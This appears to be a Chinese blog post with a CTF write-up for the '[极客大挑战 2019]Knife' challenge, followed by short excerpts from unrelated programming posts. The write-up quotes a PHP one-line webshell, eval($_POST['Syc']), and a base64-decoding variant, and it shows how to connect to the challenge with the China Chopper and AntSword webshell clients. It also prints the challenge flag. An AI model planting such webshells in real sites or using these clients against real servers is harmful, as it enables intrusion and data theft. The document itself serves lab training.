当前位置：首页 > news >正文

[极客大挑战 2019]Knife 1（两种解法）

news 2026/2/10 0:09:30

题目环境：

这道题主要考察中国菜刀和中国蚁剑的使用方法
以及对PHP一句话木马的理解
咱们先了解一下PHP一句话木马，好吗？

**eval($_POST["Syc"]);**

**eval是PHP代码执行函数，**把字符串按照 PHP 代码来执行。
$_POST PHP方法将参数Syc作为POST传参方式
可以理解为题目作者已经给我们了连接服务器的密码Syc，我们只需要使用工具连接题目地址就可以啦

一句话木马原理（来自文心一言）

一句话木马是一种精简但高效的木马，只需要一行代码即可实现和大马（全功能木马）相当的功能。其特点是短小精悍，可以用来绕过WAF（Web Application Firewall）的检测。
一句话木马通常通过GET、POST、COOKIE这三种方式向一个网站提交数据，并利用PHP的eval函数将接收到的数据当作PHP代码来执行。例如，以下是一个经典的一句话木马：eval(base64_decode(‘’));，其中eval是执行命令的函数，base64_decode(‘’)是将传递的数据解码为PHP代码的部分。
为了绕过WAF的检测，一句话木马出现了无数种变形，但本质是不变的：木马的函数执行了我们发送的命令。由于其高度的灵活性和隐蔽性，一句话木马经常被用于进行恶意攻击，如窃取敏感数据、实施CC攻击等。
需要注意的是，使用一句话木马是非法行为，可能导致严重的后果，包括但不限于罚款、监禁等。因此，建议遵守相关法律法规，不要使用或参与使用这类恶意软件。

步入正题

解法1：中国菜刀

跟着操作走即可：
打开中国菜刀鼠标右键添加

添加题目地址和连接密码以及选择PHP脚本类型即可

双击

点击/根目录即可找到flag文件

双击/根目录下的flag文件

得到flag：
flag{84829618-f50c-4c79-8212-2154477d1f99}

解法2：中国蚁剑

方法和中国菜刀大同小异，这里不再赘述。

得到flag：
flag{84829618-f50c-4c79-8212-2154477d1f99}
感谢大家，祝大家技术更进一步！

[极客大挑战 2019]Knife 1（两种解法）

题目环境： 这道题主要考察中国菜刀和中国蚁剑的使用方法以及对PHP一句话木马的理解咱们先了解一下PHP一句话木马，好吗？ **eval($_POST["Syc"]);** **eval是PHP代码执行函数，**把字符串按照 PHP 代码来执行。 $_POST P…...

编程日记 2023/11/5 4:00:07

国家统计局教育部各级各类学历教育学生情况数据爬取

教育部数据爬取 1、数据来源2、爬取目标3、网页分析4、爬取与解析5、如何使用Excel打开CSV1、数据来源国家统计局：http://www.stats.gov.cn/sj/ 教育部：http://www.moe.gov.cn/jyb_sjzl/ 数据来源：国家统计局教育部文献教育统计数据2021年全国基本情况（各级各类学历教育学…...

编程日记 2023/11/5 3:59:06

mysql 在’2023-10-27 23:59:59’上增加5秒： SELECT DATE_ADD(2023-10-27 23:59:59, INTERVAL 5 second);clickhouse SELECT date_add(SECOND, 3, toDate(2018-01-01 00:00:00));clickhouse时间按秒、分、时、日、月、年作差按秒： SELECT dateDiff…...

编程日记 2023/11/5 3:58:05

21.合并两个有序链表

#include <iostream>struct ListNode {int val;ListNode* next;ListNode(int x) : val(x), next(nullptr) {} };class Solution { public:ListNode* mergeTwoLists(ListNode* l1, ListNode* l2) {ListNode dummy ListNode(-1); // 创建一个虚拟节点作为头节点ListNode* …...

编程日记 2023/11/5 3:57:03

thinkphp漏洞复现

thinkphp漏洞复现 ThinkPHP 2.x 任意代码执行漏洞Thinkphp5 5.0.22/5.1.29 远程代码执行ThinkPHP5 5.0.23 远程代码执行ThinkPHP5 SQL Injection Vulnerability && Sensitive Information Disclosure VulnerabilityThinkPHP Lang Local File Inclusion ThinkPHP 2.x 任…...

编程日记 2023/11/5 3:56:02

暴力递归转动态规划（十三）

题目给定3个参数，N，M，K 怪兽有N滴血，等着英雄来砍自己英雄每一次打击，都会让怪兽流失[0~M]的血量到底流失多少？每一次在[0~M]上等概率的获得一个值求K次打击之后，英雄把怪兽砍死的概率。暴…...

编程日记 2023/11/5 3:54:00

java EE 进阶

java EE 主要是学框架(框架的使用,框架的原理) 框架可以说是实现了部分功能的半成品,还没装修的毛坯房,然后我们再自己打造成自己喜欢的成品这里学习四个框架 : Spring ,Spring Boot, Spring MVC, Mybatis JavaEE 一定要多练习,才能学好 Maven 目前我们主要用的两个功能: …...

编程日记 2023/11/5 3:52:59

记录paddlepaddle-gpu安装

背景由于最近需要使用paddleocr，因此需要安装依赖paddlepaddle-gpu，不管怎么安装cuda11.6-11.8安装了一遍，都无法正常安装成功。如下所示： 环境：wsl2linux18.04 >>> import paddle >>> paddle.u…...

编程日记 2023/11/5 3:49:56

django如何连接sqlite数据库？

目录一、SQLite数据库简介二、Django连接SQLite数据库 1、配置数据库 2、创建数据库表三、使用Django ORM操作SQLite数据库 1、定义模型 2、创建对象 3、查询对象总结本文将深入探讨如何在Django框架中连接和使用SQLite数据库。我们将介绍SQLite数据库的特点&…...

编程日记 2023/11/5 3:47:53

面试算法47：二叉树剪枝

题目一棵二叉树的所有节点的值要么是0要么是1，请剪除该二叉树中所有节点的值全都是0的子树。例如，在剪除图8.2（a）中二叉树中所有节点值都为0的子树之后的结果如图8.2（b）所示。分析下面总结什么样的节…...

编程日记 2023/11/5 3:46:50

云安全-云原生k8s攻击点（8080，6443，10250未授权攻击点）

0x00 k8s简介 k8s（Kubernetes） 是容器管理平台，用来管理容器化的应用，提供快速的容器调度、弹性伸缩等诸多功能，可以理解为容器云，不涉及到业务层面的开发。只要你的应用可以实现容器化，就可以部…...

编程日记 2023/11/5 3:45:49

性能压力测试主要目标及步骤

性能压力测试是软件开发生命周期中至关重要的一部分，旨在评估应用程序或系统在高负载和极端条件下的性能表现。这种测试有助于发现性能瓶颈、资源耗尽和错误，以确保应用程序在真实使用情况下的可靠性和稳定性。本文将探讨性能压力测试的概念、方法和最佳…...

编程日记 2023/11/5 3:44:48

VLAN与配置

VLAN与配置什么是VLAN 以最简单的形式为例。如下图，此时有4台主机处于同一局域网中，很明显这4台主机是能够直接通讯。但此时我需要让处于同一局域网中的PC3和PC4能通讯，PC5和PC6能通讯，并且PC3和PC4不能与PC5和PC6通讯。为了实…...

编程日记 2023/11/5 3:42:44

API接口安全设计

简介 HTTP接口是互联网各系统之间对接的重要方式之一，使用HTTP接口开发和调用都很方便，也是被大量采用的方式，它可以让不同系统之间实现数据的交换和共享。由于HTTP接口开放在互联网上，所以我们就需要有一定的安全措施来保证接口…...

编程日记 2023/11/5 3:41:43

服务器的管理口和业务口

服务器管理接口和业务接口服务器管理接口（Server Management Interface，SMI）： 服务器管理接口是一种用于管理服务器硬件和操作系统的标准接口。它通常用于远程管理和监控服务器，包括但不限于以下功能： …...

编程日记 2023/11/5 3:40:41

【gpt redis】原理篇

用的黑马程序员redis课程的目录，但是不想听讲了。后续都是用gpt文档获取的。 1.课程介绍(Av766995956,P145) 2.Redis数据结构-动态字符串(Av766995956,P146) sds 1M是个界限其实他是个由c语言实现的结构体有这么几个参数 len alloc flag char[] len是实际长度 …...

编程日记 2023/11/5 3:39:40

python二次开发Solidworks：排雷以及如何排雷？

目录 1、重要文档 2、MSDN VARIANTS 3、错误排除实例 3.1 第一个例子 3.2 第二个例子 1、重要文档 SolidWorks API 帮助文档：在 SolidWorks 的安装路径下可以找到本地文件，如 ...\Program Files\SolidWorks Corp\SolidWorks\api\apihelp.chm 。 s…...

编程日记 2023/11/5 3:38:39

广告引擎检索技术快速学习

目录一、广告系统与广告引擎介绍 （一）广告系统与广告粗分 （二）广告引擎在广告系统中的重要性分析二、广告引擎整体架构和工作过程 （一）一般概述 （二）核心功能架构图三、标…...

编程日记 2023/11/5 3:37:38

Scala的类和对象

1. 初识类和对象 Scala 的类与 Java 的类具有非常多的相似性，示例如下： // 1. 在 scala 中，类不需要用 public 声明,所有的类都具有公共的可见性 class Person {// 2. 声明私有变量,用 var 修饰的变量默认拥有 getter/setter 属性private var…...

编程日记 2023/11/5 3:36:37

SQL中＜＞(不等于)运算符只会匹配那些具有非空值的记录

0. 场景 idflag112null3 一张表的有有个varchar类型的flag字段,字段值有 null值/空值和 1。 flag为 1即表示逻辑删除,我想找出flag字段非 1 的所有情况: 一开始sql写法: select * from table where flag<>‘1’理想情况,结果集应该有2条记录(id为 2 和 3 的记录)实际情…...

编程日记 2023/11/5 3:35:34

Chapter03-Authentication vulnerabilities

文章目录 1. 身份验证简介1.1 What is authentication1.2 difference between authentication and authorization1.3 身份验证机制失效的原因1.4 身份验证机制失效的影响 2. 基于登录功能的漏洞2.1 密码爆破2.2 用户名枚举2.3 有缺陷的暴力破解防护2.3.1 如果用户登录尝试失败次…...

编程新知 2026/2/7 4:57:53

Leetcode 3577. Count the Number of Computer Unlocking Permutations

Leetcode 3577. Count the Number of Computer Unlocking Permutations 1. 解题思路2. 代码实现题目链接：3577. Count the Number of Computer Unlocking Permutations 1. 解题思路这一题其实就是一个脑筋急转弯，要想要能够将所有的电脑解锁&#x…...

编程新知 2026/1/4 2:33:39

高等数学（下）题型笔记（八）空间解析几何与向量代数

目录 0 前言 1 向量的点乘 1.1 基本公式 1.2 例题 2 向量的叉乘 2.1 基础知识 2.2 例题 3 空间平面方程 3.1 基础知识 3.2 例题 4 空间直线方程 4.1 基础知识 4.2 例题 5 旋转曲面及其方程 5.1 基础知识 5.2 例题 6 空间曲面的法线与切平面 6.1 基础知识 6.2…...

编程新知 2026/1/28 9:04:29